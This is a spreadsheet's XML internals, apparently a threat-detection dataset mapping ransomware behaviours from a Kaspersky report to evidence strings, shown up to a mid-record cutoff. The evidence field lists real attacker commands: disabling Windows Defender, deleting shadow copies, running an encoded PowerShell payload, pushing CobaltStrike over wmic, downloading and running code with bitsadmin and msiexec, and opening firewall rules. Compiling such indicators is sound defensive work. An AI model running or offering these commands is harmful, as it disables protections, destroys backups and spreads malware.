    <t>kasp-eid0157</t>
  </si>
  <si>
    <t>kasp-eid0158</t>
  </si>
  <si>
    <t>kasp-eid0159</t>
  </si>
  <si>
    <t>kasp-eid0160</t>
  </si>
  <si>
    <t>kasp-eid0161</t>
  </si>
  <si>
    <t>kasp-eid0162</t>
  </si>
  <si>
    <t>kasp-eid0163</t>
  </si>
  <si>
    <t>kasp-eid0164</t>
  </si>
  <si>
    <t>kasp-eid0165</t>
  </si>
  <si>
    <t>kasp-eid0166</t>
  </si>
  <si>
    <t>kasp-eid0167</t>
  </si>
  <si>
    <t>kasp-eid0168</t>
  </si>
  <si>
    <t>kasp-eid0169</t>
  </si>
  <si>
    <t>kasp-eid0170</t>
  </si>
  <si>
    <t>kasp-eid0171</t>
  </si>
  <si>
    <t>kasp-eid0172</t>
  </si>
  <si>
    <t>kasp-eid0173</t>
  </si>
  <si>
    <t>kasp-eid0174</t>
  </si>
  <si>
    <t>kasp-eid0175</t>
  </si>
  <si>
    <t>kasp-eid0176</t>
  </si>
  <si>
    <t>kasp-eid0177</t>
  </si>
  <si>
    <t>kasp-eid0178</t>
  </si>
  <si>
    <t>kasp-eid0179</t>
  </si>
  <si>
    <t>kasp-eid0180</t>
  </si>
  <si>
    <t>kasp-eid0181</t>
  </si>
  <si>
    <t>kasp-eid0182</t>
  </si>
  <si>
    <t>kasp-eid0183</t>
  </si>
  <si>
    <t>kasp-eid0184</t>
  </si>
  <si>
    <t>kasp-eid0185</t>
  </si>
  <si>
    <t>kasp-eid0186</t>
  </si>
  <si>
    <t>kasp-eid0187</t>
  </si>
  <si>
    <t>kasp-eid0188</t>
  </si>
  <si>
    <t>kasp-eid0189</t>
  </si>
  <si>
    <t>kasp-eid0190</t>
  </si>
  <si>
    <t>kasp-eid0191</t>
  </si>
  <si>
    <t>kasp-eid0192</t>
  </si>
  <si>
    <t>kasp-eid0193</t>
  </si>
  <si>
    <t>kasp-eid0194</t>
  </si>
  <si>
    <t>kasp-eid0195</t>
  </si>
  <si>
    <t>kasp-eid0196</t>
  </si>
  <si>
    <t>kasp-eid0197</t>
  </si>
  <si>
    <t>kasp-eid0198</t>
  </si>
  <si>
    <t>kasp-eid0199</t>
  </si>
  <si>
    <t>kasp-eid0200</t>
  </si>
  <si>
    <t>kasp-eid0201</t>
  </si>
  <si>
    <t>kasp-eid0202</t>
  </si>
  <si>
    <t>kasp-eid0203</t>
  </si>
  <si>
    <t>kasp-eid0204</t>
  </si>
  <si>
    <t>wmic-pid</t>
  </si>
  <si>
    <t>netclt-pid</t>
  </si>
  <si>
    <t>netsh-pid</t>
  </si>
  <si>
    <t>registry-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>procdump-pid</t>
  </si>
  <si>
    <t>nltest</t>
  </si>
  <si>
    <t>whoami-pid</t>
  </si>
  <si>
    <t>psexec-pid</t>
  </si>
  <si>
    <t>vss-pid</t>
  </si>
  <si>
    <t>ntds-pid</t>
  </si>
  <si>
    <t>mimikatz-pid</t>
  </si>
  <si>
    <t>powerview-pid</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of map_pid</t>
  </si>
  <si>
    <t>Count of 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</si>
</sst>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vey Wargo" refreshedDate="45770.577858564815" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="204" xr:uid="{AC6E8AD8-9D83-D748-89C3-6C3A2A5651ED}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table1"/>
  </cacheSource>
  <cacheFields count="7">
    <cacheField name="eid" numFmtId="0">
      <sharedItems count="204">
        <s v="kasp-eid0001"/>
        <s v="kasp-eid0002"/>
        <s v="kasp-eid0003"/>
        <s v="kasp-eid0004"/>
        <s v="kasp-eid0005"/>
        <s v="kasp-eid0006"/>
        <s v="kasp-eid0007"/>
        <s v="kasp-eid0008"/>
        <s v="kasp-eid0009"/>
        <s v="kasp-eid0010"/>
        <s v="kasp-eid0011"/>
        <s v="kasp-eid0012"/>
        <s v="kasp-eid0013"/>
        <s v="kasp-eid0014"/>
        <s v="kasp-eid0015"/>
        <s v="kasp-eid0016"/>
        <s v="kasp-eid0017"/>
        <s v="kasp-eid0018"/>
        <s v="kasp-eid0019"/>
        <s v="kasp-eid0020"/>
        <s v="kasp-eid0021"/>
        <s v="kasp-eid0022"/>
        <s v="kasp-eid0023"/>
        <s v="kasp-eid0024"/>
        <s v="kasp-eid0025"/>
        <s v="kasp-eid0026"/>
        <s v="kasp-eid0027"/>
        <s v="kasp-eid0028"/>
        <s v="kasp-eid0029"/>
        <s v="kasp-eid0030"/>
        <s v="kasp-eid0031"/>
        <s v="kasp-eid0032"/>
        <s v="kasp-eid0033"/>
        <s v="kasp-eid0034"/>
        <s v="kasp-eid0035"/>
        <s v="kasp-eid0036"/>
        <s v="kasp-eid0037"/>
        <s v="kasp-eid0038"/>
        <s v="kasp-eid0039"/>
        <s v="kasp-eid0040"/>
        <s v="kasp-eid0041"/>
        <s v="kasp-eid0042"/>
        <s v="kasp-eid0043"/>
        <s v="kasp-eid0044"/>
        <s v="kasp-eid0045"/>
        <s v="kasp-eid0046"/>
        <s v="kasp-eid0047"/>
        <s v="kasp-eid0048"/>
        <s v="kasp-eid0049"/>
        <s v="kasp-eid0050"/>
        <s v="kasp-eid0051"/>
        <s v="kasp-eid0052"/>
        <s v="kasp-eid0053"/>
        <s v="kasp-eid0054"/>
        <s v="kasp-eid0055"/>
        <s v="kasp-eid0056"/>
        <s v="kasp-eid0057"/>
        <s v="kasp-eid0058"/>
        <s v="kasp-eid0059"/>
        <s v="kasp-eid0060"/>
        <s v="kasp-eid0061"/>
        <s v="kasp-eid0062"/>
        <s v="kasp-eid0063"/>
        <s v="kasp-eid0064"/>
        <s v="kasp-eid0065"/>
        <s v="kasp-eid0066"/>
        <s v="kasp-eid0067"/>
        <s v="kasp-eid0068"/>
        <s v="kasp-eid0069"/>
        <s v="kasp-eid0070"/>
        <s v="kasp-eid0071"/>
        <s v="kasp-eid0072"/>
        <s v="kasp-eid0073"/>
        <s v="kasp-eid0074"/>
        <s v="kasp-eid0075"/>
        <s v="kasp-eid0076"/>
        <s v="kasp-eid0077"/>
        <s v="kasp-eid0078"/>
        <s v="kasp-eid0079"/>
        <s v="kasp-eid0080"/>
        <s v="kasp-eid0081"/>
        <s v="kasp-eid0082"/>
        <s v="kasp-eid0083"/>
        <s v="kasp-eid0084"/>
        <s v="kasp-eid0085"/>
        <s v="kasp-eid0086"/>
        <s v="kasp-eid0087"/>
        <s v="kasp-eid0088"/>
        <s v="kasp-eid0089"/>
        <s v="kasp-eid0090"/>
        <s v="kasp-eid0091"/>
        <s v="kasp-eid0092"/>
        <s v="kasp-eid0093"/>
        <s v="kasp-eid0094"/>
        <s v="kasp-eid0095"/>
        <s v="kasp-eid0096"/>
        <s v="kasp-eid0097"/>
        <s v="kasp-eid0098"/>
        <s v="kasp-eid0099"/>
        <s v="kasp-eid0100"/>
        <s v="kasp-eid0101"/>
        <s v="kasp-eid0102"/>
        <s v="kasp-eid0103"/>
        <s v="kasp-eid0104"/>
        <s v="kasp-eid0105"/>
        <s v="kasp-eid0106"/>
        <s v="kasp-eid0107"/>
        <s v="kasp-eid0108"/>
        <s v="kasp-eid0109"/>
        <s v="kasp-eid0110"/>
        <s v="kasp-eid0111"/>
        <s v="kasp-eid0112"/>
        <s v="kasp-eid0113"/>
        <s v="kasp-eid0114"/>
        <s v="kasp-eid0115"/>
        <s v="kasp-eid0116"/>
        <s v="kasp-eid0117"/>
        <s v="kasp-eid0118"/>
        <s v="kasp-eid0119"/>
        <s v="kasp-eid0120"/>
        <s v="kasp-eid0121"/>
        <s v="kasp-eid0122"/>
        <s v="kasp-eid0123"/>
        <s v="kasp-eid0124"/>
        <s v="kasp-eid0125"/>
        <s v="kasp-eid0126"/>
        <s v="kasp-eid0127"/>
        <s v="kasp-eid0128"/>
        <s v="kasp-eid0129"/>
        <s v="kasp-eid0130"/>
        <s v="kasp-eid0131"/>
        <s v="kasp-eid0132"/>
        <s v="kasp-eid0133"/>
        <s v="kasp-eid0134"/>
        <s v="kasp-eid0135"/>
        <s v="kasp-eid0136"/>
        <s v="kasp-eid0137"/>
        <s v="kasp-eid0138"/>
        <s v="kasp-eid0139"/>
        <s v="kasp-eid0140"/>
        <s v="kasp-eid0141"/>
        <s v="kasp-eid0142"/>
        <s v="kasp-eid0143"/>
        <s v="kasp-eid0144"/>
        <s v="kasp-eid0145"/>
        <s v="kasp-eid0146"/>
        <s v="kasp-eid0147"/>
        <s v="kasp-eid0148"/>
        <s v="kasp-eid0149"/>
        <s v="kasp-eid0150"/>
        <s v="kasp-eid0151"/>
        <s v="kasp-eid0152"/>
        <s v="kasp-eid0153"/>
        <s v="kasp-eid0154"/>
        <s v="kasp-eid0155"/>
        <s v="kasp-eid0156"/>
        <s v="kasp-eid0157"/>
        <s v="kasp-eid0158"/>
        <s v="kasp-eid0159"/>
        <s v="kasp-eid0160"/>
        <s v="kasp-eid0161"/>
        <s v="kasp-eid0162"/>
        <s v="kasp-eid0163"/>
        <s v="kasp-eid0164"/>
        <s v="kasp-eid0165"/>
        <s v="kasp-eid0166"/>
        <s v="kasp-eid0167"/>
        <s v="kasp-eid0168"/>
        <s v="kasp-eid0169"/>
        <s v="kasp-eid0170"/>
        <s v="kasp-eid0171"/>
        <s v="kasp-eid0172"/>
        <s v="kasp-eid0173"/>
        <s v="kasp-eid0174"/>
        <s v="kasp-eid0175"/>
        <s v="kasp-eid0176"/>
        <s v="kasp-eid0177"/>
        <s v="kasp-eid0178"/>
        <s v="kasp-eid0179"/>
        <s v="kasp-eid0180"/>
        <s v="kasp-eid0181"/>
        <s v="kasp-eid0182"/>
        <s v="kasp-eid0183"/>
        <s v="kasp-eid0184"/>
        <s v="kasp-eid0185"/>
        <s v="kasp-eid0186"/>
        <s v="kasp-eid0187"/>
        <s v="kasp-eid0188"/>
        <s v="kasp-eid0189"/>
        <s v="kasp-eid0190"/>
        <s v="kasp-eid0191"/>
        <s v="kasp-eid0192"/>
        <s v="kasp-eid0193"/>
        <s v="kasp-eid0194"/>
        <s v="kasp-eid0195"/>
        <s v="kasp-eid0196"/>
        <s v="kasp-eid0197"/>
        <s v="kasp-eid0198"/>
        <s v="kasp-eid0199"/>
        <s v="kasp-eid0200"/>
        <s v="kasp-eid0201"/>
        <s v="kasp-eid0202"/>
        <s v="kasp-eid0203"/>
        <s v="kasp-eid0204"/>
      </sharedItems>
    </cacheField>
    <cacheField name="map_pid" numFmtId="0">
      <sharedItems containsBlank="1" count="14">
        <m/>
        <s v="wmic-pid"/>
        <s v="netclt-pid"/>
        <s v="netsh-pid"/>
        <s v="registry-pid"/>
        <s v="pshell-pid"/>
        <s v="procdump-pid"/>
        <s v="nltest"/>
        <s v="whoami-pid"/>
        <s v="psexec-pid"/>
        <s v="vss-pid"/>
        <s v="ntds-pid"/>
        <s v="mimikatz-pid"/>
        <s v="powerview-pid"/>
      </sharedItems>
    </cacheField>
    <cacheField name="map_did" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1" count="1">
        <m/>
      </sharedItems>
    </cacheField>
    <cacheField name="eid_type" numFmtId="0">
      <sharedItems/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems longText="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems count="1">
        <s v="{ &quot;data&quot;: &quot;2022-06&quot;, &quot;url&quot;: &quot;https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf&quot;, &quot;tags&quot;: [&quot;conti&quot;, &quot;cl0p&quot;,&quot;hive&quot;, &quot;alphv&quot;, &quot;lockbit&quot;, &quot;blackbyte&quot;]}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x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Exploit public facing app. Attackers target Microsoft Exchange Servers,_x000a_Sharepoint servers, VPN and other web services. The most commonly exploited vulnerabilities are ProxyShell CVEs: CVE-2021-34473, CVE-2021-34523 and CVE-2021-31207 "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;initiating_process_path&quot;: &quot;$windir\$system32\inetsrv\w3wp.exe&quot;, &quot;process_command_line&quot;: &quot;$windir\$system32\WindowsPowerShell\_x000a_v1.0\powershell.exe -nop -exec bypass -EncodedCommand &lt;base64&gt;&quot;}"/>
    <s v="CVE-2021031207"/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="(&quot;object&quot;: &quot;process_create&quot;, &quot;process_commad_line&quot;: &quot;cmd /c c:\\users\\public\\compareForFor.hta&quot;, &quot;file_path&quot;: &quot;$windir\\$system32\\cmd.exe&quot;, &quot;initiating_process_path&quot;: &quot;$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="3"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="(&quot;object&quot;: &quot;process_create&quot;, &quot;process_commad_line&quot;: &quot;regsvr32 $user\$appdata\Vote1.ocx&quot;, &quot;file_path&quot;: &quot;$windir\$system32\regsvr32.exe&quot;, &quot;initiating_process_path&quot;: &quot;$programfiles\\Microsoft Office\\Office14\\WINWORD.EXE&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="4"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Windows\System32\ShellExperiences\Windows Host.xml"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="5"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\WindowsHost.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="6"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Windows\System32\Tasks\Windows Host"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="7"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Local\Microsoft\Windows\Fonts\Courie-BoldItalic.ttf"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="8"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\Templates\VideoDefault.txt"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="9"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\System Update.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="10"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\&lt;xxx&gt;\AppData\Roaming\Microsoft\Windows\PowerShell\pw.System.ps1"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="11"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” Enable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="12"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v=" $windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “Set-MpPreference -EnableControlledFolderAccess Disabled”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="13"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\WindowsPowerShell\v1.0\powershell.exe Install-WindowsFeature -Name \”RSAT-ADPowerShell\” –IncludeAllSubFeature"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="14"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\WindowsPowerShell\v1.0\powershell.exe -command “$x = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String(‘RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAg’+’AFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8AC’+’AARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkA’+’F8ALgBEAGUAbABlAHQAZQAoACkOwB9AA==’));Invoke-Expression $x”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="15"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v=" powershell New-ItemProperty -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="16"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="powershell Set-MpPreference -DisableRealTimeMonitoring $true"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="17"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="powershell Uninstall-WindowsFeature -Name Windows-Defender"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="18"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="powershell Set-MpPreference -DisableIOAVProtection $true"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="19"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="powershell Set-MpPreference -DisableRealTimeMonitoring $true"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="20"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="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"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="21"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“powershell -command \”Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | FT Name\””"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="22"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="“powershell.exe -ExecutionPolicy Bypass -file \\[REMOTE _ HOSTNAME]\share$\p.ps1”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="23"/>
    <x v="1"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;,  &quot;process_path&quot;: &quot;$windir\$system32\wbem\WMIC.exe&quot;, &quot;process_command_line&quot;: &quot;wmic shadowcopy delete&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="24"/>
    <x v="1"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_path&quot;: &quot;$windir\$system32\wbem\WMIC.exe&quot;, &quot;process_command_line&quot;: &quot;wmic csproduct get UUID&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="25"/>
    <x v="1"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r''' wmic /node:&lt;IP _ address&gt; /user:”&lt;domain&gt;\&lt;user&gt;” /password:”&lt;password&gt;” process call create “cmd /c &lt;cobaltstrike _ path&gt;”'''}"/>
    <s v="WMI is used to spread malware over the network. For_x000a_example, the Conti CobaltStrike beacon was spread via the wmic tool:"/>
    <x v="0"/>
  </r>
  <r>
    <x v="26"/>
    <x v="1"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''start wmic /node:@C:\share$\comps##.txt /user:” &lt;xxx&gt;.com\&lt;xxx&gt;” /password:”*********” process call create “cmd.exe /c bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe&amp;%APPDATA%\xxx.exe”'''}"/>
    <s v="WMIC to push malware"/>
    <x v="0"/>
  </r>
  <r>
    <x v="27"/>
    <x v="1"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;file_path&quot;: &quot; $windir\$system32\wbem\WMIC.exe&quot;, &quot;process_command_line&quot;: r''' “$windir\$system32\Wbem\WMIC.exe” process where “name like ‘%manage%’” delete'''}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="28"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;process_command_line&quot;: r'''“ “$windir\\$system32\\schtasks.exe /create /np /sc HOURLY /tn Task /tr \”$windir\\$system32\\cmd.exe /c for /l %x in (1,1,75) do start wordpad.exe /p C:\\Users\\tree.dll\” /st 07:00”''', &quot;initiating_process_path&quot;: “$windir\\regedit.exe”}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="29"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="schtasks /create /sc minute /mo 1 /tn Server /tr $user\$temp/Server.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="30"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image: $system32\attrib.exe_x000a_Command _ line: attrib +h +r +s “C:\Users\[user]\AppData\Local\Temp\Payload.exe”_x000a_Parent _ image _ path: $selfpath\$selfname.exe"/>
    <s v="hide file "/>
    <x v="0"/>
  </r>
  <r>
    <x v="31"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="Image _ path: $selfpath\$1sass.exe_x000a_Registry _ key: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run_x000a_Target _ file: $windir\$system32\$1sass.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="32"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /V “Virtual Printer Driver&quot; /t REG _ SZ /F /D ”$user\$appdata\Macromedia\Temporary\WinPrint.exe”"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="33"/>
    <x v="0"/>
    <x v="0"/>
    <s v="file_path"/>
    <s v="C:\Users\[user]\AppData\Roaming\Microsoft\Windows\StartMenu\Programs\Startup\"/>
    <s v="startup persistence"/>
    <x v="0"/>
  </r>
  <r>
    <x v="34"/>
    <x v="0"/>
    <x v="0"/>
    <s v="generic"/>
    <s v="HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run_x000a_HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce_x000a_HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run_x000a_HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"/>
    <s v="reg run keys addes"/>
    <x v="0"/>
  </r>
  <r>
    <x v="35"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net user xxx [password] /add /active:yes /expires:never"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="36"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net group “Enterprise admins” /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="37"/>
    <x v="2"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="net group “Domain admins” /domain"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="38"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Bitsadmin /transfer debjob /download \\[localuser]\C$\Windows\[Conti].dll C:\Windows\[conti].dll"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="39"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="bitsadmin /transfer xxx \\&lt;xxx&gt;\share$\xxx.exe %APPDATA%\xxx.exe &amp; %APPDATA%\xxx.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="40"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG _ DWORD /d 1 /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="41"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;file_path&quot;: &quot;$windir\$system32\msiexec.exe&quot;, &quot;process_command_line&quot;: &quot;$windir\$system32\msiexec.exe /q /I hxxp://&lt;ip&gt;/&lt;resource&gt;&quot;"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="42"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;file_path&quot;: &quot; $windir\$system32\mshta.exe&quot;, &quot;process_command_line&quot;: &quot;$windir\$system32\mshta.exe ‘C:\Users\Public\compareForFor.jpg’ {1E460BD7-F1C3-4B2E-88BF4E770A288AF5} {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}&quot;, &quot;initating_process_path&quot;: &quot;windir\$system32\cmd.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="43"/>
    <x v="0"/>
    <x v="0"/>
    <s v="object"/>
    <s v="{&quot;object&quot;: &quot;process_create&quot;, &quot;file_path&quot;: &quot; $windir\$system32\regsvr32.exe&quot;, &quot;process_command_line&quot;: &quot; $windir\$system32\regsvr32.exe C:\Users\Public\compareForFor.jpg&quot;, &quot;initiating_process_name&quot;: &quot; $windir\$system32\mshta.exe&quot;}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="44"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\regedit.exe -single 1df11bc19aa52b623bdf15380e3fded56d8eb6fb7b53a2240779864b1a6474ad"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="45"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule group=”Remote Desktop” new enable=yes"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="46"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh advfirewall firewall set rule File and Printer Sharing new enable=Yes "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="47"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh firewall add allowedprogram “$user\$temp\svchos23.exe” “svchos23.exe” ENABLE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="48"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh firewall add allowedprogram “$user\$temp\cheats.exe” “cheats.exe” ENABLE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="49"/>
    <x v="3"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="netsh firewall add allowedprogram “$user\$temp\IXP000.TMP\crypted.exe” “crypted.exe” ENABLE"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="50"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="taskill.exe /F /IM Raccine.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="51"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="taskill.exe /F /IM RaccineSettings.exe"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="52"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="$windir\$system32\schtasks.exe /DELETE /TN “Raccine Rules Updater” /F "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="53"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="Get-WmiObject Win32 _ Shadowcopy |ForEach-Object {$ _ .Delete();}"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="54"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\System\CurrentControlSet\Services\SecurityHealthService” /v “Start” /t REG _ DWORD /d “4” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="55"/>
    <x v="0"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe delete “HKLM\Software\Policies\Microsoft\Windows Defender” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="56"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiSpyware” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="57"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add “HKLM\Software\Policies\Microsoft\Windows Defender” /v “DisableAntiVirus” /t REG _ DWORD /d “1” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="58"/>
    <x v="4"/>
    <x v="0"/>
    <s v="cmdline"/>
    <s v="reg.exe add HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine” /v “MpEnablePus” /t REG _ DWORD /d “0” /f"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="59"/>
